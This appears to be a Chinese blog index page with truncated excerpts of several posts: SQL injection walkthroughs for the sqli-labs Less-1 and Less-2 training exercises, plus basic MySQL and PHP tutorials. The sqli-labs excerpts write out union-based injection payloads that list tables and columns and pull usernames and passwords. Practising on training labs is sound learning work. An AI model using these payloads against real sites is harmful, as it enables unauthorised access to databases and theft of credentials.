风不及你甜

Less-2第二关和第一关思路是一样的 Less-2和Less-1唯一的区别就是id类型不同了，Less-2的id是一个int类型 按照上一篇的检测方法 接下来就和第一关的一样了 查看多少列 id=1 order by 3–+ 查看什么地方有回显 id=-1 union select 1,2,3–+ 爆库 id=-1 union select 1,2,database()–+ 爆表名 id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ –+ 爆列名 id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ –+ 爆数据 ?id=-1 union select 1,2,group_concat(concat_ws(‘,’,username,password) sepa ...

Less-11、判断是数字型还是字符型分别添加?id=1, ?id=2, ?id=2-1 ，观察页面的变化，判断是字符型还是数字型。如果id=2-1 与 id=1的页面一样，就是数字型；如果id=2-1与id=2的页面一样，就是字符型 因为1与2-1一样，它是字符型。 2、通过报错判断闭合符在id=2后面分别加上' , " 即单引号，双引号! 发现加'时报错了，而加"是正常显示，说明闭合符是'。所以我们应该使用'，让它闭合。 3、确认查询的字段数量1http://localhost/sql/Less-1/?id=1' order by 3 --+ 在后面分别添加?id=1'order by 1 --+，?id=1'order by 2 --+，?id=1'order by 3 --+……order by n --+，观察是否报错 我们发现在by 3的时候还是正常的，而by 4的时候就没了，说明要查询的字段数量是3个。 4、确认占位信息把id的值换成-1，不让它显示正常的值，然后在后面加上union s ...

MySQL 连接12[root@host]# mysql -u root -pEnter password:****** 在登录成功后会出现 mysql> 命令提示窗口，你可以在上面执行任何 SQL 语句。 以上命令执行后，登录成功输出结果如下: 1234Welcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 2854760 to server version: 5.0.9Type 'help;' or '\h' for help. Type '\c' to clear the buffer. MySQL 创建数据库1CREATE DATABASE 数据库名; 例如 1234[root@host]# mysql -u root -p Enter password:****** # 登录后进入终端mysql> create DATABASE RUNOOB; MySQL 删除数据库drop 命令删除数 ...

PHP 超级全局变量PHP系统中自带的变量，在一个脚本的全部作用域中都可用。 PHP中预定义了几个超级全局变量（superglobals） ，这意味着它们在一个脚本的全部作用域中都可用。 不需要特别说明就可以在函数及类中使用。 常用的超级全局变量： 123456789• $GLOBALS• $_SERVER• $_REQUEST• $_POST• $_GET• $_FILES• $_ENV• $_COOKIE• $_SESSION PHP $GLOBALS$GLOBALS 是PHP的一个超级全局变量组，在一个PHP脚本的全部作用域中都可以访问。$GLOBALS 是一个包含了全部变量的全局组合数组。变量的名字就是数组的键。以下实例介绍了如何使用超级全局变量 $GLOBALS: 123456789101112<?php $x = 75; $y = 25; function addition() { $GLOBALS['z'] = $GLOBALS['x&#x ...

PHP命名空间命名空间定义PHP5.3.0 新增的一种封装事物的方法，解决编写的类库或应用程序时命名冲突的问题，类似window系统的文件夹 关键字 namespace 必须声明命名空间，必须处于程序脚本的第一条语句，即声明前不能有任意的字符输出，如空格或html标签等； 命名空间中可以包含任意合法的php代码，受命名空间影响的有类、函数、常量 PHP >=5.3.0 开始支持 namespace 可以代表当前空间，类似类中的self;namespace\Home\Student() 创建一个namespace.php文件 12345678910111213141516171819202122232425<?php //声明一个App的命名空间 namespace App //1 定义一个类 class student{ private $name = "小德"; private $age = "28"; public function __construct() ...